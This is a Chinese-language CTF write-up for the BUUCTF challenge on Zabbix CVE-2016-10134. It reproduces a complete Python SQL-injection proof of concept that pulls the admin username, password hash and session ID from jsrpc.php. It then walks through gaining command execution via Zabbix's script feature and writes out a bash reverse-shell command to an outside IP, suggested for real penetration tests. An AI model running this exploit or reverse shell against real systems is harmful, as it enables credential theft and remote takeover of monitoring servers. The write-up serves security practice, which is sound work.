BUU一血！[Zabbix]CVE-2016-10134

zabbix：

zabbix（[`zæbiks]）是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。

zabbix能监视各种网络参数，保证服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

zabbix由2部分构成，zabbix server与可选组件zabbix agent。

zabbix server可以通过SNMP，zabbix agent，ping，端口监视等方法提供对远程服务器/网络状态的监视，数据收集等功能，它可以运行在Linux，Solaris，HP-UX，AIX，Free BSD，Open BSD，OS X等平台上。–来自百度百科

CVE-2016-10134：

总的来说是一个sql注入漏洞，可以跑出来用户名密码，和session。由于session直接存放在前台，所以直接可以换session登录

16年的洞了，复现的文章一抓一大把，在此就不做复现原理了，题目在buuctf的real类里面，昨晚拿的一血

题目：

普普通通简简单单的一个界面，标志着有一个高危漏洞
先放poc

#!/usr/bin/env python
# -*- coding: utf_8 -*-
# Date: 2016/8/18
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import urllib2
import sys, os
import re
def deteck_Sql():
u'检查是否存在SQL注入'
payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(url + payload, timeout=10).read()
except Exception, msg:
print msg
else:
key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
if key_reg.findall(response):
return True
def sql_Inject(sql):
u'获取特定sql语句内容'
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=10).read()
except Exception, msg:
print msg
else:
result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
results = result_reg.findall(response)
if results:
return results[0]
if __name__ == '__main__':
# os.system(['clear', 'cls'][os.name == 'nt'])
print '+' + '-' * 60 + '+'
print '\t Python Zabbix print '\t Blog：http://www.waitalone.cn/'
print '\t\t Code BY： 独自等待'
print '\t\t Time：2016-08-18'
print '+' + '-' * 60 + '+'
if len(sys.argv) != 2:
print '用法: ' + os.path.basename(sys.argv[0]) + ' Zabbix 网站地址'
print '实例: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/'
sys.exit()
url = sys.argv[1]
if url[-1] != '/': url += '/'
passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
if deteck_Sql():
print u'Zabbix 存在SQL注入漏洞!\n'
print u'管理员 用户名密码：%s' % sql_Inject(passwd_sql)
print u'管理员 Session_id：%s' % sql_Inject(session_sql)
else:
print u'Zabbix 不存在SQL注入漏洞!\n'

poc在此不做解析，网上一堆堆的
#直接说本题我的写法

#飞哥的exe，python脚本加的gui界面，打包。说实在的蛮好用
将md5拿去网页跑一下

注意有的平台跑不出来
#现在可以登陆了
用户名是admin

里面是这个样子，乍一看没啥点
翻来翻去

#在Administration->Script里面添加脚本

这里注意Execute on要选成Zabbix server格式，否则无法运行，这里跟网上流传的不一样
如果是实战渗透的话，我们这里加一个bash命令的反弹shell就可以

root# bash -i >& /dev/tcp/192.168.31.41/8080 0>&1

我们在此直接添加env查看环境变量就可以

这里真是坑啊，万万没想到会放到环境变量里面，说到底还是菜，buu刷的少
###脚本添加好之后，就可以寻找触发点了，这里又跟网上之前的教程有所出入###
#我们直接在Monitoring->Screens里面找到一台主机就可以#


#右键点击network图标，出现可以触发的脚本，我们点击刚才写入的脚本就可以

#查看环境变量

本题结束
#说到底还是太菜，继续努力！